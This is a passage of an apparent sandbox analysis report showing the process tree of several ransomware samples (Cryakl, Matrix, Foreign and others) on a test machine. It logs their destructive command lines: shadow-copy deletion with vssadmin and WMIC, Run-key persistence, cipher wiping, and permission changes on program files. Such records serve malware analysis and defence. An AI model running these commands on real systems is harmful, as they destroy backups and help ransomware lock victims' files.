                          • Interacts with shadow copies
                          PID:1640
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe"
                        3⤵
                          PID:3400
                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe
                        Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:1940
                        • C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe
                          "C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe"
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in System32 directory
                          • Drops file in Windows directory
                          • Suspicious behavior: RenamesItself
                          PID:2672
                          • C:\Windows\SysWOW64\shell.exe
                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Local\Temp\EJQTK.bat"
                            4⤵
                              PID:8152
                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe
                          Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          • Suspicious use of SetWindowsHookEx
                          PID:1828
                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe
                            rojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe
                            3⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops desktop.ini file(s)
                            • Drops file in Program Files directory
                            • Suspicious behavior: RenamesItself
                            PID:1288
                            • C:\Windows\SysWOW64\shell.exe
                              "C:\Windows\system32\shell.exe" "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe > nul
                              4⤵
                                PID:3780
                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exe
                            Trojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exe
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Adds Run key to start application
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1260
                            • C:\Users\Admin\AppData\Local\Microsoft\msconfig.exe
                              C:\Users\Admin\AppData\Local\Microsoft\msconfig.exe
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • System Location Discovery: System Language Discovery
                              PID:448
                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe
                            Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1648
                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe
                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:4764
                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe
                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe"
                              3⤵
                              • Executes dropped EXE
                              • Maps connected drives based on registry
                              • Suspicious behavior: MapViewOfSection
                              PID:3468
                              • C:\Windows\SysWOW64\explorer.exe
                                explorer.exe
                                4⤵
                                • Adds Run key to start application
                                PID:4484
                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe
                            Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe
                            2⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Modifies system certificate store
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:2116
                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe
                            Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe
                            2⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Modifies system certificate store
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1652
                            • C:\Windows\SysWOW64\wbem\WMIC.exe
                              "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3800
                            • C:\Users\Admin\AppData\Roaming\Buomf\otheo.exe
                              "C:\Users\Admin\AppData\Roaming\Buomf\otheo.exe"
                              3⤵
                              • Checks computer location settings
                              • Adds Run key to start application
                              • Sets desktop wallpaper using registry
                              • Modifies registry class
                              PID:4968
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html
                                4⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of SetWindowsHookEx
                                PID:3192
                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3192 CREDAT:275457 /prefetch:2
                                  5⤵
                                  • Drops desktop.ini file(s)
                                  • Modifies Internet Explorer settings
                                  PID:6080
                              • C:\Windows\SysWOW64\shell.exe
                                "C:\Windows\system32\shell.exe" "C:\Windows\System32\cipher.exe" /W:C
                                4⤵
                                • Suspicious use of SetWindowsHookEx
                                PID:2092
                              • C:\Windows\SysWOW64\shell.exe
                                "C:\Windows\system32\shell.exe" "C:\Windows\System32\cipher.exe" /W:F
                                4⤵
                                • Suspicious use of SetWindowsHookEx
                                PID:6556
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_5a59414b.bat"
                                4⤵
                                  PID:2244
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_72a44b2a.bat"
                                  4⤵
                                    PID:4288
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_b485b959.bat"
                                  3⤵
                                    PID:5832
                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe
                                  Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Enumerates connected drives
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  PID:1988
                                  • C:\Users\Admin\Desktop\00361\2aua0mwa.exe
                                    "C:\Users\Admin\Desktop\00361\2aua0mwa.exe" -n
                                    3⤵
                                    • Executes dropped EXE
                                    PID:1852
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /C reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v README /t REG_SZ /d "\"%ProgramFiles%\Windows NT\Accessories\wordpad.exe\" \"C:\Users\Admin\AppData\Roaming\#Decrypt_Files_ReadMe#.rtf"" /f & WMIC.exe shadowcopy delete /nointeractive & vssadmin.exe delete shadows /all /quiet
                                    3⤵
                                      PID:4344
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v README /t REG_SZ /d "\"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe\" \"C:\Users\Admin\AppData\Roaming\#Decrypt_Files_ReadMe#.rtf"" /f
                                        4⤵
                                        • Adds Run key to start application
                                        PID:5992
                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                        WMIC.exe shadowcopy delete /nointeractive
                                        4⤵
                                          PID:6080
                                        • C:\Windows\SysWOW64\vssadmin.exe
                                          vssadmin.exe delete shadows /all /quiet
                                          4⤵
                                          • Interacts with shadow copies
                                          PID:856
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\AUTHORS.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\AUTHORS.txt"
                                        3⤵
                                          PID:3268
                                          • C:\Windows\SysWOW64\cacls.exe
                                            CACLS "C:\Program Files\VideoLAN\VLC\AUTHORS.txt" /E /G Admin:F /C
                                            4⤵
                                              PID:5364
                                            • C:\Windows\SysWOW64\attrib.exe
                                              ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\AUTHORS.txt"
                                              4⤵
                                              • Views/modifies file attributes
                                              PID:3688
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\COPYING.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\COPYING.txt"
                                            3⤵
                                              PID:1224
                                              • C:\Windows\SysWOW64\cacls.exe
                                                CACLS "C:\Program Files\VideoLAN\VLC\COPYING.txt" /E /G Admin:F /C
                                                4⤵
                                                  PID:3556
                                                • C:\Windows\SysWOW64\attrib.exe
                                                  ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\COPYING.txt"
                                                  4⤵
                                                  • Views/modifies file attributes
                                                  PID:3864
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt"
                                                3⤵
                                                  PID:1564
                                                  • C:\Windows\SysWOW64\cacls.exe
                                                    CACLS "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt" /E /G Admin:F /C
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2684
                                                  • C:\Windows\SysWOW64\attrib.exe
                                                    ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt"
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Views/modifies file attributes
                                                    PID:2248
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\NEWS.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\NEWS.txt"
                                                  3⤵
                                                    PID:5296
                                                    • C:\Windows\SysWOW64\cacls.exe
                                                      CACLS "C:\Program Files\VideoLAN\VLC\NEWS.txt" /E /G Admin:F /C
                                                      4⤵
                                                        PID:1708
                                                      • C:\Windows\SysWOW64\attrib.exe
                                                        ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\NEWS.txt"
                                                        4⤵
                                                        • Views/modifies file attributes
                                                        PID:5904
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\README.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\README.txt"
                                                      3⤵
                                                        PID:4520
                                                        • C:\Windows\SysWOW64\cacls.exe
                                                          CACLS "C:\Program Files\VideoLAN\VLC\README.txt" /E /G Admin:F /C
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3236
                                                        • C:\Windows\SysWOW64\attrib.exe
                                                          ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\README.txt"
                                                          4⤵
                                                          • Views/modifies file attributes
                                                          PID:3528
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\THANKS.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\THANKS.txt"
                                                        3⤵
                                                          PID:2680
                                                          • C:\Windows\SysWOW64\cacls.exe
                                                            CACLS "C:\Program Files\VideoLAN\VLC\THANKS.txt" /E /G Admin:F /C
                                                            4⤵
                                                              PID:1872
                                                            • C:\Windows\SysWOW64\attrib.exe
                                                              ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\THANKS.txt"
                                                              4⤵
                                                              • Views/modifies file attributes
                                                              PID:3368
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT"
                                                            3⤵
                                                              PID:3356
                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT" /E /G Admin:F /C
                                                                4⤵
                                                                  PID:4824
                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                  ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT"
                                                                  4⤵
                                                                  • Views/modifies file attributes
                                                                  PID:1872
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
                                                                3⤵
                                                                  PID:5940
                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                    CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
                                                                    4⤵
                                                                      PID:1256
                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                      ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
                                                                      4⤵
                                                                      • Views/modifies file attributes
                                                                      PID:5856
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5828
                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                      CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
                                                                      4⤵
                                                                        PID:1664
                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                        ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
                                                                        4⤵
                                                                        • Views/modifies file attributes
                                                                        PID:2844
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
                                                                      3⤵
                                                                        PID:5628
                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                          CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
                                                                          4⤵
                                                                            PID:2180
                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                            ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
                                                                            4⤵
                                                                            • Views/modifies file attributes
                                                                            PID:3120
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
                                                                          3⤵
                                                                            PID:5096
                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                              CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
                                                                              4⤵
                                                                                PID:6236
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Views/modifies file attributes
                                                                                PID:6364
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
                                                                              3⤵
                                                                                PID:6412
                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                  CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
                                                                                  4⤵
                                                                                    PID:6096
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
                                                                                    4⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:5284
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:3452
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:3544
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:5164
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:6700
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7356
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:264
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7400
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7428
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7548
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:6896
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:3924
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:5296
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:4704
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7696
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7744
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:7840
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
                                                                                  3⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:4992
                                                                              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe
                                                                                Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Adds Run key to start application
                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
